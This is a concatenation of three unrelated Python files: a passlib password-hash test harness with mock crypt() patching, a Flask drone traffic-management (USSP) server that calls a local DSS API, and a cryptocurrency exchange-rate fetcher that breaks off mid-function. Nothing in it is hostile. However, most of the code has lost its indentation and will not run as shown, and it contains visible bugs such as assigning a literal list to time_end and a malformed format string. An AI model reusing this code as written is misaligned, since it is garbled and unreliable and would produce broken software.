if rng.random() < .0001:
return u('')
# check if truncate size needs to be considered
handler = self.handler
truncate_size = handler.truncate_error and handler.truncate_size
max_size = truncate_size or 999999
# pick endpoint
if max_size < 50 or rng.random() < .5:
# chance of small password (~15 chars)
size = self.randintgauss(1, min(max_size, 50), 15, 15)
else:
# otherwise large password (~70 chars)
size = self.randintgauss(50, min(max_size, 99), 70, 20)
# generate random password
result = getrandstr(rng, self.password_alphabet, size)
# trim ones that encode past truncate point.
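            # (the alphabet contains multi-byte unicode chars, so the utf-8 encoding can
            #  exceed truncate_size even when len(result) <= truncate_size)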
if truncate_size and isinstance(result, unicode):
while len(result.encode("utf-8")) > truncate_size:
result = result[:-1]
return result
def accept_password_pair(self, secret, other):
"""verify fuzz pair contains different passwords"""
return secret != other
#==========================================================
# eoc FuzzGenerator
#==========================================================
#===================================================================
# "disabled hasher" api
#===================================================================
def test_disable_and_enable(self):
""".disable() / .enable() methods"""
#
# setup
#
handler = self.handler
if not handler.is_disabled:
self.assertFalse(hasattr(handler, "disable"))
self.assertFalse(hasattr(handler, "enable"))
self.assertFalse(self.disabled_contains_salt)
raise self.skipTest("not applicable")
#
# disable()
#
# w/o existing hash
disabled_default = handler.disable()
self.assertIsInstance(disabled_default, str,
msg="disable() must return native string")
self.assertTrue(handler.identify(disabled_default),
msg="identify() didn't recognize disable() result: %r" % (disabled_default))
# w/ existing hash
stub = self.getRandom().choice(self.known_other_hashes)[1]
disabled_stub = handler.disable(stub)
self.assertIsInstance(disabled_stub, str,
msg="disable() must return native string")
self.assertTrue(handler.identify(disabled_stub),
msg="identify() didn't recognize disable() result: %r" % (disabled_stub))
#
# enable()
#
# w/o original hash
self.assertRaisesRegex(ValueError, "cannot restore original hash",
handler.enable, disabled_default)
# w/ original hash
try:
result = handler.enable(disabled_stub)
error = None
except ValueError as e:
result = None
error = e
if error is None:
# if supports recovery, should have returned stub (e.g. unix_disabled);
self.assertIsInstance(result, str,
msg="enable() must return native string")
self.assertEqual(result, stub)
else:
            # if it doesn't support recovery, it should have thrown the appropriate error
            self.assertIsInstance(error, ValueError)
            self.assertRegex(str(error), "cannot restore original hash")
#
# test repeating disable() & salting state
#
# repeating disabled
disabled_default2 = handler.disable()
if self.disabled_contains_salt:
# should return new salt for each call (e.g. django_disabled)
self.assertNotEqual(disabled_default2, disabled_default)
elif error is None:
# should return same result for each hash, but unique across hashes
self.assertEqual(disabled_default2, disabled_default)
# repeating same hash ...
disabled_stub2 = handler.disable(stub)
if self.disabled_contains_salt:
# ... should return different string (if salted)
self.assertNotEqual(disabled_stub2, disabled_stub)
else:
# ... should return same string
self.assertEqual(disabled_stub2, disabled_stub)
# using different hash ...
disabled_other = handler.disable(stub + 'xxx')
if self.disabled_contains_salt or error is None:
# ... should return different string (if salted or hash encoded)
self.assertNotEqual(disabled_other, disabled_stub)
else:
# ... should return same string
self.assertEqual(disabled_other, disabled_stub)
#===================================================================
# eoc
#===================================================================
#=============================================================================
# HandlerCase mixins providing additional tests for certain hashes
#=============================================================================
class OsCryptMixin(HandlerCase):
"""helper used by create_backend_case() which adds additional features
to test the os_crypt backend.
* if crypt support is missing, inserts fake crypt support to simulate
a working safe_crypt, to test passlib's codepath as fully as possible.
* extra tests to verify non-conformant crypt implementations are handled
correctly.
* check that native crypt support is detected correctly for known platforms.
"""
#===================================================================
# class attrs
#===================================================================
# platforms that are known to support / not support this hash natively.
# list of (platform_regex, True|False|None) entries.
platform_crypt_support = []
#: flag indicating backend provides a fallback when safe_crypt() can't handle password
has_os_crypt_fallback = True
#: alternate handler to use when searching for backend to fake safe_crypt() support.
alt_safe_crypt_handler = None
#===================================================================
# instance attrs
#===================================================================
__unittest_skip = True
# force this backend
backend = "os_crypt"
# flag read by HandlerCase to detect if fake os crypt is enabled.
using_patched_crypt = False
#===================================================================
# setup
#===================================================================
def setUp(self):
assert self.backend == "os_crypt"
if not self.handler.has_backend("os_crypt"):
self._patch_safe_crypt()
super(OsCryptMixin, self).setUp()
@classmethod
def _get_safe_crypt_handler_backend(cls):
"""
return (handler, backend) pair to use for faking crypt.crypt() support for hash.
        backend will be None if none available.
"""
# find handler that generates safe_crypt() compatible hash
handler = cls.alt_safe_crypt_handler
if not handler:
handler = unwrap_handler(cls.handler)
# hack to prevent recursion issue when .has_backend() is called
handler.get_backend()
# find backend which isn't os_crypt
alt_backend = get_alt_backend(handler, "os_crypt")
return handler, alt_backend
def _patch_safe_crypt(self):
"""if crypt() doesn't support current hash alg, this patches
safe_crypt() so that it transparently uses another one of the handler's
backends, so that we can go ahead and test as much of code path
as possible.
"""
# find handler & backend
handler, alt_backend = self._get_safe_crypt_handler_backend()
if not alt_backend:
raise AssertionError("handler has no available alternate backends!")
# create subclass of handler, which we swap to an alternate backend
alt_handler = handler.using()
alt_handler.set_backend(alt_backend)
def crypt_stub(secret, hash):
hash = alt_handler.genhash(secret, hash)
assert isinstance(hash, str)
return hash
import passlib.utils as mod
self.patchAttr(mod, "_crypt", crypt_stub)
self.using_patched_crypt = True
@classmethod
def _get_skip_backend_reason(cls, backend):
"""
make sure os_crypt backend is tested
when it's known os_crypt will be faked by _patch_safe_crypt()
"""
assert backend == "os_crypt"
reason = super(OsCryptMixin, cls)._get_skip_backend_reason(backend)
from passlib.utils import has_crypt
if reason == cls.BACKEND_NOT_AVAILABLE and has_crypt:
if TEST_MODE("full") and cls._get_safe_crypt_handler_backend()[1]:
# in this case, _patch_safe_crypt() will monkeypatch os_crypt
# to use another backend, just so we can test os_crypt fully.
return None
else:
return "hash not supported by os crypt()"
return reason
#===================================================================
# custom tests
#===================================================================
# TODO: turn into decorator, and use mock library.
def _use_mock_crypt(self):
"""
patch passlib.utils.safe_crypt() so it returns mock value for duration of test.
returns function whose .return_value controls what's returned.
this defaults to None.
"""
import passlib.utils as mod
def mock_crypt(secret, config):
# let 'test' string through so _load_os_crypt_backend() will still work
if secret == "test":
return mock_crypt.__wrapped__(secret, config)
else:
return mock_crypt.return_value
mock_crypt.__wrapped__ = mod._crypt
mock_crypt.return_value = None
self.patchAttr(mod, "_crypt", mock_crypt)
return mock_crypt
def test_80_faulty_crypt(self):
"""test with faulty crypt()"""
hash = self.get_sample_hash()[1]
exc_types = (AssertionError,)
mock_crypt = self._use_mock_crypt()
def test(value):
# set safe_crypt() to return specified value, and
# make sure assertion error is raised by handler.
mock_crypt.return_value = value
self.assertRaises(exc_types, self.do_genhash, "stub", hash)
self.assertRaises(exc_types, self.do_encrypt, "stub")
self.assertRaises(exc_types, self.do_verify, "stub", hash)
test('$x' + hash[2:]) # detect wrong prefix
test(hash[:-1]) # detect too short
test(hash + 'x') # detect too long
def test_81_crypt_fallback(self):
"""test per-call crypt() fallback"""
# mock up safe_crypt to return None
mock_crypt = self._use_mock_crypt()
mock_crypt.return_value = None
if self.has_os_crypt_fallback:
# handler should have a fallback to use when os_crypt backend refuses to handle secret.
h1 = self.do_encrypt("stub")
h2 = self.do_genhash("stub", h1)
self.assertEqual(h2, h1)
self.assertTrue(self.do_verify("stub", h1))
else:
# handler should give up
from passlib.exc import MissingBackendError
hash = self.get_sample_hash()[1]
self.assertRaises(MissingBackendError, self.do_encrypt, 'stub')
self.assertRaises(MissingBackendError, self.do_genhash, 'stub', hash)
self.assertRaises(MissingBackendError, self.do_verify, 'stub', hash)
def test_82_crypt_support(self):
"""test platform-specific crypt() support detection"""
# NOTE: this is mainly just a sanity check to ensure the runtime
# detection is functioning correctly on some known platforms,
# so that I can feel more confident it'll work right on unknown ones.
if hasattr(self.handler, "orig_prefix"):
raise self.skipTest("not applicable to wrappers")
platform = sys.platform
for pattern, state in self.platform_crypt_support:
if re.match(pattern, platform):
break
else:
raise self.skipTest("no data for %r platform" % platform)
if state is None:
# e.g. platform='freebsd8' ... sha256_crypt not added until 8.3
raise self.skipTest("varied support on %r platform" % platform)
elif state != self.using_patched_crypt:
return
elif state:
self.fail("expected %r platform would have native support "
"for %r" % (platform, self.handler.name))
else:
self.fail("did not expect %r platform would have native support "
"for %r" % (platform, self.handler.name))
#===================================================================
    # fuzz verifier support -- add new verifier that uses os crypt()
#===================================================================
def fuzz_verifier_crypt(self):
"""test results against OS crypt()"""
# don't use this if we're faking safe_crypt (pointless test),
# or if handler is a wrapper (only original handler will be supported by os)
handler = self.handler
if self.using_patched_crypt or hasattr(handler, "wrapped"):
return None
        # create a wrapper for the fuzz verifier to use
from crypt import crypt
encoding = self.FuzzHashGenerator.password_encoding
def check_crypt(secret, hash):
"""stdlib-crypt"""
if not self.crypt_supports_variant(hash):
return "skip"
secret = to_native_str(secret, encoding)
return crypt(secret, hash) == hash
return check_crypt
def crypt_supports_variant(self, hash):
"""
        fuzz_verifier_crypt() helper --
used to determine if os crypt() supports a particular hash variant.
"""
return True
#===================================================================
# eoc
#===================================================================
class UserHandlerMixin(HandlerCase):
"""helper for handlers w/ 'user' context kwd; mixin for HandlerCase
this overrides the HandlerCase test harness methods
so that a username is automatically inserted to hash/verify
calls. as well, passing in a pair of strings as the password
will be interpreted as (secret,user)
"""
#===================================================================
# option flags
#===================================================================
default_user = "user"
requires_user = True
user_case_insensitive = False
#===================================================================
# instance attrs
#===================================================================
__unittest_skip = True
#===================================================================
# custom tests
#===================================================================
def test_80_user(self):
"""test user context keyword"""
handler = self.handler
password = 'stub'
hash = handler.hash(password, user=self.default_user)
if self.requires_user:
self.assertRaises(TypeError, handler.hash, password)
self.assertRaises(TypeError, handler.genhash, password, hash)
self.assertRaises(TypeError, handler.verify, password, hash)
else:
# e.g. cisco_pix works with or without one.
handler.hash(password)
handler.genhash(password, hash)
handler.verify(password, hash)
def test_81_user_case(self):
"""test user case sensitivity"""
lower = self.default_user.lower()
upper = lower.upper()
hash = self.do_encrypt('stub', context=dict(user=lower))
if self.user_case_insensitive:
self.assertTrue(self.do_verify('stub', hash, user=upper),
"user should not be case sensitive")
else:
self.assertFalse(self.do_verify('stub', hash, user=upper),
"user should be case sensitive")
def test_82_user_salt(self):
"""test user used as salt"""
config = self.do_stub_encrypt()
h1 = self.do_genhash('stub', config, user='admin')
h2 = self.do_genhash('stub', config, user='admin')
self.assertEqual(h2, h1)
h3 = self.do_genhash('stub', config, user='root')
self.assertNotEqual(h3, h1)
# TODO: user size? kinda dicey, depends on algorithm.
#===================================================================
# override test helpers
#===================================================================
def populate_context(self, secret, kwds):
"""insert username into kwds"""
if isinstance(secret, tuple):
secret, user = secret
elif not self.requires_user:
return secret
else:
user = self.default_user
if 'user' not in kwds:
kwds['user'] = user
return secret
#===================================================================
# modify fuzz testing
#===================================================================
class FuzzHashGenerator(HandlerCase.FuzzHashGenerator):
context_map = HandlerCase.FuzzHashGenerator.context_map.copy()
context_map.update(user="random_user")
user_alphabet = u("asdQWE123")
def random_user(self):
rng = self.rng
if not self.test.requires_user and rng.random() < .1:
return None
return getrandstr(rng, self.user_alphabet, rng.randint(2,10))
#===================================================================
# eoc
#===================================================================
class EncodingHandlerMixin(HandlerCase):
"""helper for handlers w/ 'encoding' context kwd; mixin for HandlerCase
this overrides the HandlerCase test harness methods
so that an encoding can be inserted to hash/verify
calls by passing in a pair of strings as the password
will be interpreted as (secret,encoding)
"""
#===================================================================
# instance attrs
#===================================================================
__unittest_skip = True
# restrict stock passwords & fuzz alphabet to latin-1,
# so different encodings can be tested safely.
stock_passwords = [
u("test"),
b"test",
u("\u00AC\u00BA"),
]
class FuzzHashGenerator(HandlerCase.FuzzHashGenerator):
password_alphabet = u('qwerty1234<>.@*#! \u00AC')
def populate_context(self, secret, kwds):
"""insert encoding into kwds"""
if isinstance(secret, tuple):
secret, encoding = secret
kwds.setdefault('encoding', encoding)
return secret
#===================================================================
# eoc
#===================================================================
#=============================================================================
# warnings helpers
#=============================================================================
class reset_warnings(warnings.catch_warnings):
"""catch_warnings() wrapper which clears warning registry & filters"""
def __init__(self, reset_filter="always", reset_registry=".*", **kwds):
super(reset_warnings, self).__init__(**kwds)
self._reset_filter = reset_filter
self._reset_registry = re.compile(reset_registry) if reset_registry else None
def __enter__(self):
# let parent class archive filter state
ret = super(reset_warnings, self).__enter__()
# reset the filter to list everything
if self._reset_filter:
warnings.resetwarnings()
warnings.simplefilter(self._reset_filter)
# archive and clear the __warningregistry__ key for all modules
# that match the 'reset' pattern.
pattern = self._reset_registry
if pattern:
backup = self._orig_registry = {}
for name, mod in list(sys.modules.items()):
if mod is None or not pattern.match(name):
continue
reg = getattr(mod, "__warningregistry__", None)
if reg:
backup[name] = reg.copy()
reg.clear()
return ret
def __exit__(self, *exc_info):
# restore warning registry for all modules
pattern = self._reset_registry
if pattern:
# restore registry backup, clearing all registry entries that we didn't archive
backup = self._orig_registry
for name, mod in list(sys.modules.items()):
if mod is None or not pattern.match(name):
continue
reg = getattr(mod, "__warningregistry__", None)
if reg:
reg.clear()
orig = backup.get(name)
if orig:
if reg is None:
setattr(mod, "__warningregistry__", orig)
else:
reg.update(orig)
super(reset_warnings, self).__exit__(*exc_info)
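# Illustrative usage sketch (not part of the original suite): reset_warnings is a
# context manager, so a test can run a block with a clean warning registry and an
# "always" filter, guaranteeing previously-issued warnings are re-emitted:
#
#   with reset_warnings():
#       warnings.warn("deprecated", DeprecationWarning)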
#=============================================================================
# eof
#=============================================================================
|
custom_uss.py
|
#!/usr/bin/python3
import json
import os
import uuid
import threading
import time
import logging
import random
import requests
from flask_socketio import SocketIO
from datetime import datetime, timedelta
from flask import Flask, request
from isa import ISA
from subscription import Subscription
from flight import Flight
## PARAMS ##
# if True, the USSP will assign a random delay compared to the time start specified when creating the flight
accept_flight_with_random_late_time = True
# highest and lowest values for the random delay (in seconds)
random_delay_high = 10 * 60
random_delay_low = 0
class USSP():
"""
USSP actions with API
"""
def __init__(self, _id, _port):
self.id = _id
self.read_token = None
self.write_token = None
self.read_headers = None
self.write_headers = None
self.isas = []
self.subscriptions = []
self.flights = []
print("USSP %s created" % self.id)
self.port = _port
self.app = Flask(__name__)
self.socketio = SocketIO(self.app)
# to disable logging information
# set log disabled to False for all logging information
log = logging.getLogger('werkzeug')
log.disabled = True
## FOR PPRZ -- DONT TOUCH ##
@self.socketio.on('TELEMETRY')
def handle_tele(_tele):
tele = json.loads(_tele)
flight_id = tele["id"]
try:
flight = next(flight for flight in self.flights if str(flight.id) == str(flight_id))
except StopIteration:
print("ERROR THAT SHOULDNT HAPPEN N° 5")
return
flight.last_telemetry_report = tele
if flight.telemetry_started:
pass
else:
print("TELEMETRY STARTED FOR FLIGHT ", flight_id)
flight.telemetry_started = True
@self.app.route("/%s" % self.id , methods=["GET"])
def home_page():
return ("HOMEPAGE")
@self.app.route("/%s/flights" % self.id, methods=["GET", "POST"])
def flights():
## FOR PPRZ -- DONT TOUCH ##
if request.method == 'POST':
print("FLIGHT REQUEST")
data = json.loads(request.data.decode("utf-8"))
# run strategic deconfliction things for vertiports (and airspace ?)
# this will return a time allocated for take off
# until this works, we just send the requested take off time
flight_id = uuid.uuid1()
if accept_flight_with_random_late_time:
delay = random.randint(random_delay_low, random_delay_high)
print("ACCEPTING FLIGHT %s WITH %s DELAY" % (flight_id, delay))
start_time = data["start_time"] + delay
end_time = data["end_time"] + delay
else:
start_time = data["start_time"]
end_time = data["end_time"]
# TODO
# create flight in ussp database and make its information avalable to other ussps
# /!\ requires to assign an ISA to the flight
# for now, we create a flight with just flight_id, start and end time
flight = Flight(flight_id, None, None, None, start_time, end_time)
flight.status = "CREATED"
self.flights.append(flight)
print(flight.get_json())
return flight.get_json()
## END DONT TOUCH ##
## GOOD TO KEEP TO CHECK TELEMETRY HOWEVER ##
elif request.method == 'GET':
flight_info = []
for flight in self.flights:
flight_info.append(flight.get_json())
return(str(flight_info))
@self.app.route("/%s/flights/<string:flight_id>" % self.id, methods=['GET', 'POST'])
def flight_information(flight_id):
if request.method == "POST":
return("POST flight_information")
## GOOD TO KEEP TO CHECK TELEMETRY HOWEVER ##
elif request.method == "GET":
try:
flight = next(flight for flight in self.flights if str(flight.id) == str(flight_id))
return str(flight.get_json())
except StopIteration:
return ("FLIGHT DOESNT EXIST")
## FOR PPRZ -- DONT TOUCH ##
@self.app.route("/%s/flights/<string:flight_id>/start_flight" % self.id, methods=['GET', 'POST'])
def start_flight(flight_id):
# check if flight has been created
# and if time to start is close to current time (complicated?, not for now)
# send flight confirmation message and endpoint to provide telemetry
try:
flight = next(flight for flight in self.flights if str(flight.id) == flight_id)
except StopIteration:
print("ERROR THAT SHOULDNT HAPPEN N° 3")
return 'flight id not found in database', 400
flight.status = "STARTED"
print("STARTING FLIGHT %s" % flight.get_json())
response = json.dumps({
"flight_id": flight_id,
"flight_status": flight.status,
"telemetry_endpoint": "http://localhost:%s" % self.port
})
return response
## END DONT TOUCH ##
## FOR PPRZ -- DONT TOUCH ##
@self.app.route("/%s/flights/<string:flight_id>/end_flight" % self.id, methods=['GET', 'POST'])
def end_flight(flight_id):
try:
flight = next(flight for flight in self.flights if str(flight.id) == flight_id)
except StopIteration:
print("ERROR THAT SHOULDNT HAPPEN N° 7")
return 'flight id not found in database', 400
print ("FLIGHT %s ENDED" % flight_id)
flight.status = "ENDED"
response = json.dumps({
"flight_id": flight_id,
"flight_status": flight.status
})
return response
@self.app.route("/%s/flights/<string:flight_id>/details" % self.id, methods=["GET"])
def get_flight_details(flight_id):
return ("flight details")
## END DONT TOUCH ##
def run_thread_server():
self.app.run('localhost', _port)
self.thread_server = threading.Thread(target=run_thread_server, daemon=True)
self.thread_server.start()
time.sleep(1) # give time for server to start
def authentify_read(self):
"""
Get the token for reading requests.
"""
params = (
('sub', self.id),
('intended_audience', 'localhost'),
('scope', 'dss.read.identification_service_areas'),
('issuer', 'dummy_oauth'),
)
        response = requests.get('http://localhost:8085/token', params=params)
#print(response.json())
if response.status_code == 200:
self.read_token = response.json()["access_token"]
self.read_headers = {
'Authorization': 'Bearer %s' % self.read_token,
'Content-Type': 'application/json'
}
print("USSP %s auth read with token %s" % (self.id, self.read_token))
else:
print("Error in auth read process %ss" % response.text)
return response.status_code
def authentify_write(self):
"""
Get the token for writing requests.
"""
params = (
('sub', self.id),
('intended_audience', 'localhost'),
('scope', 'dss.write.identification_service_areas'),
('issuer', 'dummy_oauth'),
)
        response = requests.get('http://localhost:8085/token', params=params)
#print(response.json())
if response.status_code == 200:
self.write_token = response.json()["access_token"]
self.write_headers = {
'Authorization': 'Bearer %s' % self.write_token,
'Content-Type': 'application/json'
}
print("USSP %s auth write with token %s" % (self.id, self.write_token))
else:
print("Error in auth write process %" % response.text)
return response.status_code
"""
ISA METHODS.
"""
def get_isa(self, _isa_id):
"""
Get ISA details by its ID.
"""
url = "http://localhost:8082/v1/dss/identification_service_areas/%s" % _isa_id
        response = requests.get(url, headers=self.read_headers)
print(response.json())
print("USSP %s attempting to get ISA %s" % (self.id, _isa_id))
print(response.text)
return response
def create_isa(self, _name, _geometry, _time_start, _time_end):
"""
Create an ISA.
"""
new_isa_id = uuid.uuid1()
isa = ISA(new_isa_id, _geometry, _time_start, _time_end)
self.isas.append(isa)
print("ISA created with id %s" % new_isa_id)
print(isa)
def create_isa_test(self):
"""
Create a predetermined ISA "toulouse" for testing.
"""
new_isa_id = uuid.uuid1()
now = datetime.now()
time_start = now.strftime("%Y-%m-%dT%H:%M:%SZ")
tomorrow = datetime.now() + timedelta(days=1)
time_end = tomorrow.strftime("%Y-%m-%dT%H:%M:%SZ")
name = "toulouse"
geometry = {"footprint": {
"vertices": [{
"lng": 1.206266,
"lat": 43.764436
},
{
"lng": 1.258522,
"lat": 43.500720
},
{
"lng": 1.631048,
"lat": 43.515354
},
{
"lng": 1.594875,
"lat": 43.763197
}
]},
"altitude_lo": 0,
"altitude_hi": 500
}
isa = ISA(name, new_isa_id, geometry, time_start, time_end, self.id)
self.isas.append(isa)
print("ISA created with id %s" % new_isa_id)
print(isa)
def submit_isa(self, _isa_id = None, _isa_name = None):
"""
        Submit ISA to API by its ID or Name.
"""
isa_id = ''
submitted = False
try:
if _isa_id is not None:
isa = next(isa for isa in self.isas if str(isa.id) == str(_isa_id))
isa_id = _isa_id
elif _isa_name is not None:
isa = next(isa for isa in self.isas if str(isa.name) == str(_isa_name))
isa_id = isa.id
submitted = isa.submitted
        except StopIteration:
            print("ISA not existing in USSP database")
            print("Use create_isa before submitting")
            return
if not submitted:
payload = json.dumps({
"extents": {
"spatial_volume": isa.geometry,
"time_start": isa.time_start,
"time_end": isa.time_end
},
"flights_url": "http://localhost:%s/%s/%s" % (self.port, self.id, isa.id)
})
print("USSP %s attempting to submit ISA %s" % (self.id, isa_id))
            response = requests.request('PUT', "http://localhost:8082/v1/dss/identification_service_areas/%s" % isa_id, headers=self.write_headers, data=payload)
#print(response.json())
if response.status_code == 200:
print("ISA successfully submitted")
isa.submitted = True
else:
print("ISA already submitted")
print(response.text)
def delete_isa(self, _isa_id = None, _isa_name = None):
"""
Deleting an ISA by its ID or its Name.
"""
isa_id = ''
submitted = True
try:
print("Attempting to delete ISA from USSP database")
if _isa_id is not None:
isa = next(isa for isa in self.isas if str(isa.id) == str(_isa_id))
isa_id = _isa_id
elif _isa_name is not None:
isa = next(isa for isa in self.isas if str(isa.name) == str(_isa_name))
isa_id = isa.id
submitted = isa.submitted
            self.isas.remove(isa)
            print("ISA %s deleted from local USSP database" % isa_id)
except StopIteration:
print("ISA not existing in USSP database")
isa_id = _isa_id
if submitted:
print("Attempting to delete ISA %s from DSS database" % isa_id)
dss_isa = self.get_isa(isa_id)
dss_isa_version = dss_isa.json()['service_area']['version']
url = "http://localhost:8082/v1/dss/identification_service_areas/%s/%s" % (isa_id, dss_isa_version)
            response = requests.delete(url, headers=self.write_headers)
#print(response.json())
if response.status_code == 200:
print("ISA successfully deleted from DSS database")
else:
print("Error when attempting to delete ISA from DSS")
print(response.text)
else:
print("The ISA was not submitted to DSS, cant delete from DSS")
"""
SUBSCRIPTION METHODS.
"""
def get_subscription(self, _sub_id):
"""
Get a Sub by its ID.
"""
print("sub_id : ", _sub_id)
url = "http://localhost:8082/v1/dss/subscriptions/%s" % _sub_id
        response = requests.get(url, headers=self.read_headers)
print(response.json())
print("USSP %s attempting to get subscription %s" % (self.id, _sub_id))
print(response.text)
if response.status_code == 200:
return response
else:
return None
def create_subscription_test(self):
"""
Create a predetermined Sub with Name 'toulouse' for testing.
"""
new_sub_id = uuid.uuid1()
now = datetime.now()
time_start = now.strftime("%Y-%m-%dT%H:%M:%SZ")
tomorrow = datetime.now() + timedelta(days=1)
time_end = tomorrow.strftime("%Y-%m-%dT%H:%M:%SZ")
name = "toulouse"
geometry = {"footprint": {
"vertices": [{
"lng": 1.206266,
"lat": 43.764436
},
{
"lng": 1.258522,
"lat": 43.500720
},
{
"lng": 1.631048,
"lat": 43.515354
},
{
"lng": 1.594875,
"lat": 43.763197
}
]},
"altitude_lo": 0,
"altitude_hi": 500
}
subscription = Subscription(name, new_sub_id, geometry, time_start, time_end)
self.subscriptions.append(subscription)
print("Subscription created with id %s" % new_sub_id)
print(subscription)
def create_subscription(self, _name, _geometry, _time_start, _time_end):
"""
Create a Sub.
"""
new_sub_id = uuid.uuid1()
subscription = Subscription(_name, new_sub_id, _geometry, _time_start, _time_end)
self.subscriptions.append(subscription)
print("Subscription created with id %s" % new_sub_id)
print(subscription)
def submit_subscription(self, _sub_id = None, _sub_name = None):
"""
Submit a Sub to API by its ID or Name.
"""
sub_id = ''
submitted = False
try:
if _sub_id is not None:
subscription = next(sub for sub in self.subscriptions if str(sub.id) == str(_sub_id))
sub_id = _sub_id
elif _sub_name is not None:
subscription = next(sub for sub in self.subscriptions if str(sub.name) == str(_sub_name))
sub_id = subscription.id
submitted = subscription.submitted
        except StopIteration:
            print("Subscription not existing in USSP database")
            print("Use create_sub before submitting")
            return
if not submitted:
payload = json.dumps({
"extents": {
"spatial_volume": subscription.geometry,
"time_start": subscription.time_start,
"time_end": subscription.time_end
},
"callbacks": {
"identification_service_area_url": "http://localhost:%s/%s/%s" % (self.port, self.id, subscription.id)
}
})
print("USSP %s attempting to subscribe with sub_id %s" % (self.id, sub_id))
            response = requests.request('PUT', "http://localhost:8082/v1/dss/subscriptions/%s" % sub_id, headers=self.read_headers, data=payload)
#print(response.json())
if response.status_code == 200:
print("Subscription successfully submitted")
subscription.submitted = True
else:
print("Subscription not submitted")
print(response.text)
def delete_subscription(self, _sub_id = None, _sub_name = None):
"""
Delete a Sub by its ID or Name.
"""
sub_id = ''
submitted = True
try:
print("Attempting to delete subscription from USSP database")
if _sub_id is not None:
subscription = next(sub for sub in self.subscriptions if str(sub.id) == str(_sub_id))
sub_id = _sub_id
elif _sub_name is not None:
subscription = next(sub for sub in self.subscriptions if str(sub.name) == str(_sub_name))
sub_id = subscription.id
submitted = subscription.submitted
            self.subscriptions.remove(subscription)
            print("Subscription deleted from local USSP database")
except StopIteration:
print("Subscription not existing in USSP database")
sub_id = _sub_id
if submitted:
print("Attempting to delete subscription from DSS database")
dss_sub = self.get_subscription(sub_id)
dss_sub_version = dss_sub.json()['subscription']['version']
url = "http://localhost:8082/v1/dss/subscriptions/%s/%s" % (sub_id, dss_sub_version)
            response = requests.delete(url, headers=self.read_headers)
#print(response.json())
if response.status_code == 200:
print("Subscription successfully deleted from DSS database")
else:
print("Error when attempting to delete sub from DSS")
print(response.text)
else:
print("The subscription was not submitted to DSS, cant delete from DSS")
def create_flight(self, _data):
#data = json.dumps(_data.decode('utf8').replace("'", '"'))
data = json.loads(_data.decode('utf8'))
print(data)
id = uuid.uuid1()
buffer = data["buffer"]
max_alt = data["max_alt"]
min_alt = data["min_alt"]
time_start = data["time_start"]
time_end = ["time_end"]
flight = Flight(id, buffer, max_alt, min_alt, time_start, time_end)
self.flights.append(flight)
return flight
def assign_isa_to_flight(self, flight):
# here we just check if toulouse ISA exists for the flight
# we consider that in our scenario all flights will take place in toulouse
# and assign it to the flight
# TODO later : make something that really does the job
for isa in self.isas:
if isa.name == "toulouse":
flight.assigned_isa_id = isa.id
    def start_flight(self, flight_id):
        for flight in self.flights:
            if str(flight.id) == str(flight_id):
                # ASSIGN ISA AND CONFIRM FLIGHT START
                self.assign_isa_to_flight(flight)
                flight.status = "STARTED"
                return True, flight.get_json()
        # no matching flight found
        return False, "FLIGHT NOT EXISTING, REQUEST DENIED"
# def update_flight_status(self, flight_id, status) waiting for clearance, active
# def check_flight_conformity(self, flight_id), check if its in the stated isas
|
exchange_rate.py
|
from datetime import datetime
import inspect
import requests
import sys
from threading import Thread
import time
import traceback
import csv
from decimal import Decimal
from bitcoin import COIN
from i18n import _
from util import PrintError, ThreadJob
from util import format_satoshis
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0,
# Not ISO 4217.
'BTC': 8}
DEFAULT_EXCHANGE = 'Bittrex'
DEFAULT_CCY = 'BTC'
class ExchangeBase(PrintError):
def __init__(self, on_quotes, on_history):
self.history = {}
self.quotes = {}
self.on_quotes = on_quotes
self.on_history = on_history
def get_json(self, site, get_string):
# APIs must have https
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={
'User-Agent': 'Electrum-SECI'
})
return response.json()
def get_csv(self, site, get_string):
url = ''.join(['https://', site, get_string])
response = requests.request('GET', url, headers={
'User-Agent': 'Electrum-SECI'
})
        reader = csv.DictReader(response.text.split('\n'))
return list(reader)
def name(self):
return self.__class__.__name__
def update_safe(self, ccy):
try:
self.print_error("getting fx quotes for", ccy)
self.quotes = self.get_rates(ccy)
self.print_error("received fx quotes")
except BaseException as e:
self.print_error("failed fx quotes:", e)
self.on_quotes()
def update(self, ccy):
t = Thread(target=self.update_safe, args=(ccy,))
t.setDaemon(True)
t.start()
def get_historical_rates_safe(self, ccy):
try:
self.print_error("requesting fx history for", ccy)
self.history[ccy] = self.historical_rates(ccy)
self.print_error("received fx history for", ccy)
self.on_history()
except BaseException as e:
self.print_error("failed fx history:", e)
def get_historical_rates(self, ccy):
result = self.history.get(ccy)
if not result and ccy in self.history_ccys():
t = Thread(target=self.get_historical_rates_safe, args=(ccy,))
t.setDaemon(True)
t.start()
return result
def history_ccys(self):
return []
def historical_rate(self, ccy, d_t):
return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'))
def get_currencies(self):
rates = self.get_rates('')
        return sorted([str(a) for (a, b) in rates.items() if b is not None and len(a) == 3])
class Bittrex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('bittrex.com',
'/api/v1.1/public/getticker?market=BTC-SECI')
quote_currencies = {}
if not json.get('success', False):
return quote_currencies
last = Decimal(json['result']['Last'])
quote_currencies['BTC'] = last
return quote_currencies
class Poloniex(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('poloniex.com', '/public?command=returnTicker')
quote_currencies = {}
seci_ticker = json.get('BTC_SECI')
quote_currencies['BTC'] = Decimal(seci_ticker['last'])
return quote_currencies
class CoinMarketCap(ExchangeBase):
def get_rates(self, ccy):
json = self.get_json('api.coinmarketcap.com', '/v1/ticker/seci/')
quote_currencies = {}
if not isinstance(json, list):
return quote_currencies
json = json[0]
for ccy, key in [
('USD', 'price_usd'),
('BTC', 'price_btc'),
]:
quote_currencies[ccy] = Decimal(json[key])
return quote_currencies
def dictinvert(d):
inv = {}
    for k, vlist in d.items():
for v in vlist:
